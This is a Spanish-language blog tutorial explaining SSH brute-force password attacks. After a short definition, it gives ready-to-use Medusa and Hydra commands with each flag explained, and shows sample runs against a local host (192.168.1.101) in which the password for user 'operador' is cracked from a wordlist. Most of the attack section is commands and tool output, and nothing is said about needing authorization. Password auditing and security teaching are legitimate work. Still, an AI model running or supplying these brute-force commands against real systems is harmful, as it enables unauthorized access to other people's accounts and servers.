HowTo: Ataque fuerza bruta SSH

criptografía, se denomina ataque de fuerza bruta a la forma de recuperar una clave probando todas las combinaciones posibles hasta encontrar aquella que permite el acceso.

Dicho de otro modo, define al procedimiento por el cual a partir del conocimiento del algoritmo de cifrado empleado y de un par texto claro/texto cifrado, se realiza el cifrado (respectivamente, descifrado) de uno de los miembros del par con cada una de las posibles combinaciones de clave, hasta obtener el otro miembro del par. El esfuerzo requerido para que la búsqueda sea exitosa con probabilidad mejor que la par será 2n − 1 operaciones, donde n es la longitud de la clave (también conocido como el espacio de claves).

 

Bueno, vamos a probar varios programas para realizar este pequeño tutorial.

Medusa 

Medusa  es una aplicación para realizar auditorias de fuerza bruta muy sencilla que permite diversos protocolos para atacar (AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware autenticación Daemon (vmauthd), VNC, Genérico, Wrapper, Web Form)

Comando:

medusa -h <DIRECCION_IP> -u <Usuario> -P <Diccionario_PASS> -M ssh

Explicación:


-h: indicamos el host al cual atacar, si ponemos -H indicamos un fichero el cual se almacenaran todos los hosts que vamos atacar

-u: Indicamos el nombre de usuario al que queremos atacar. -U indicamos el diccionario donde se almacenaran la lista de usuarios para atacar.

-p: Indicamos el password que vamos a probar. -P  indicamos el diccionario donde se almacenaran la lista de password para atacar.

-M: Indicamos el modulo para el protocolo que nos interese atacar.

 

Ejemplo:

medusa -h 192.168.1.101 -u operador -P pass -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ssh] Host: 192.168.1.101 (1 of 1, 0 complete) User: operador (1 of 1, 0 complete) Password: a (1 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.101 (1 of 1, 0 complete) User: operador (1 of 1, 0 complete) Password: e (2 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.101 (1 of 1, 0 complete) User: operador (1 of 1, 0 complete) Password: i (3 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.101 (1 of 1, 0 complete) User: operador (1 of 1, 0 complete) Password: o (4 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.101 (1 of 1, 0 complete) User: operador (1 of 1, 0 complete) Password: u (5 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.101 (1 of 1, 0 complete) User: operador (1 of 1, 0 complete) Password: aaaaaaa (6 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.101 (1 of 1, 0 complete) User: operador (1 of 1, 0 complete) Password: asdddddddddddd (7 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.101 (1 of 1, 0 complete) User: operador (1 of 1, 0 complete) Password: xxxxxxxxxxxxxxxxxx (8 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.101 (1 of 1, 0 complete) User: operador (1 of 1, 0 complete) Password: operador (9 of 9 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.101 User: operador Password: operador [SUCCESS]

 

 

THC-HYDRA 

Hydra es un crackeador  de fuerza bruta que soporta numerosos protocolos para atacar. Incluye módulos fáciles de añadir, además de eso, es flexible y muy rápido. La versión 6 ha sido probado para compilar limpiamente en Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 y OSX.
Actualmente esta herramienta es compatible con: AFP, CVS, Firebird, FTP, HTTP, HTTP Form, HTTP Proxy, ICQ, IRC, IMAP, LDAP, MS-SQL, MySQL, NCP, NNTP, Oracle, PC-NFS, POP3, pcAnywhere(Native Authentication), PostgreSQL, REXEC, RDP, RLOGIN, RSH, SAP R/3, SIP, SMB, SMTP, SMTP User Enum, SNMP(V1), SOCKS, SSH, Subversion(SVN), TeamSpeak, Telnet, VNC, VMWare Auth Daemon, XMPP)

Comando:

hydra 192.168.1.101 ssh -s <Puerto> -l <Usuario> -P <Diccionario_PASS>  -t  <Tasks>

-s: Puerto

-l: Indicamos el nombre de usuario al que queremos atacar. -L indicamos el diccionario donde se almacenaran la lista de usuarios para atacar.

 

-p: Indicamos el password que vamos a probar. -P  indicamos el diccionario donde se almacenaran la lista de password para atacar.

Ejemplo:

hydra 192.168.1.101 ssh -s 22 -l operador -P pass -t 36
Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak – for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-11-27 21:33:17
WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort…
[DATA] 9 tasks, 1 server, 9 login tries (l:1/p:9), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.101 login: operador password: operador
[STATUS] attack finished for 192.168.1.101 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-11-27 21:33:34

Un saludo, rokitoh!

 

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

*